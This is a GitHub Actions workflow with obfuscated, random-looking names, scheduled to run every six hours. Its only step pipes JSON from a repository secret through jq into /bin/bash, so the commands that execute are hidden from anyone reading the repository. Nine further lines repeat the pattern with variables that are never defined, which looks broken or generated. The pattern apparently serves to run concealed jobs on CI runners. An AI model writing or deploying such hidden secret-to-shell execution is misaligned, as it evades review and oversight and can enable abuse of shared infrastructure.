name: qiantonghe8765
on:
  workflow_dispatch:
  schedule:
    - cron: '59 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: qiantonghe8765
        env:
          vgwz0: ${{ secrets.vgwz0 }}
        run: |
          echo $vgwz0 | jq -r .pvtw07 | /bin/bash
          echo $xn56839 | jq -r .rs5785 | /bin/bash
          echo $k289 | jq -r .msu6075 | /bin/bash
          echo $r10364 | jq -r .r8613 | /bin/bash
          echo $h9413 | jq -r .txtht7936 | /bin/bash
          echo $hbf6271 | jq -r .nkjzj63 | /bin/bash
          echo $htana07 | jq -r .mg85991 | /bin/bash
          echo $ww0269 | jq -r .dndn706 | /bin/bash
          echo $myk8 | jq -r .kkew004 | /bin/bash
          echo $dz7270 | jq -r .m15 | /bin/bash

